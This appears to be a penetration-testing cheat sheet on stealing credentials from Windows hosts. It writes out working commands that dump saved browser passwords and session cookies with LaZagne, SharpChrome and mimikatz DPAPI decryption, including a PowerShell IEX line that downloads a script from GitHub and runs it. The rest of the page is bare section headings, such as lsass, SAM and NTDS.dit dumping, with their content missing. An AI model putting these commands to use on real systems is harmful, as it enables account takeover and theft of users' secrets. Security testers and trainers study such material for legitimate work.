Credentials Attacks On Windows
Web Credentials
PS C:\> start lazagne.exe all
PS C:\> .\\SharpChrome.exe logins /unprotect
PS C:\> vaultcmd /list
PS C:\> vaultcmd /listcreds:"Web Credentials" /all
#-----------EDGE---------------------------------
#Extract credentials from Edge Browswer
PS C:\> (Get-Content "C:\Users\john.Ford\AppData\Local\Microsoft\Edge\User Data\Local State" | ConvertFrom-Json).os_crypt.encrypted_key
mimikatz dpapi::chrome /in:"C:\Users\john.Ford\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" /encryptedkey:<SNIF>e4x8+n0VDX82CffsyVmOzvSraXQ== /unprotect
#-----------Firefox-------------------------------
#Extract passwords from profiles of Mozilla
Intrusionz3r0@htb[/htb]$ python firefox_decrypt.py /folder/containing/profiles.ini/
#Cookies
#Path: %APPDATA%\Mozilla\Firefox\Profiles\<RANDOM>.default-release
Intrusionz3r0@htb[/htb]$ python3 cookieextractor.py --dbpath "cookies.sqlite" --host slack --cookie d
#---------Chromium--------------------------------
PS C:\> (Get-Content "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State" | ConvertFrom-Json).os_crypt.encrypted_key
mimikatz dpapi::chrome /in:"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data" /encryptedkey:[EncryptedKey] /unprotect
#Cookies
#Path: %LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Network\\Cookies
PS C:\> IEX(New-Object Net.WebClient).DownloadString('<https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')
PS C:\> copy "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Network\\Cookies" "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Cookies"
PS C:\> Invoke-SharpChromium -Command "cookies slack.com"Credentials manager
DPAPI
Search Credentials
Extract credentials using SessionGopher
Sniff passwords and hashes with net-creds
Search credentials on the registry
Search for file contents
Search for filename
Passwords in unattend.xml
Retrieve Putty Credentials from registry
PowerShell
Powershell History File
Powershell Transcript
Recover credentials on PowerShell scripts
First Option:
Second Option
Alternate Data Stream
Retrieve Credentials on data streams
Clipboard
Monitor Clipboard
Sensitive Files
IIS Web config
Retrieve password from Wireless
Sticky notes
Copying SAM SYSTEM and Security
Dumping SAM and SYSTEM
Dump LSA
Dump lsass
Dump lsass using RDP session

Dump NTDS.dit
To make a copy of the NTDS.dit file, we need local admin (Administrators group) or Domain Admin (Domain Admins group) (or equivalent) rights.
Mimikatz
Bypassing LSA protection
Error: ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

Last updated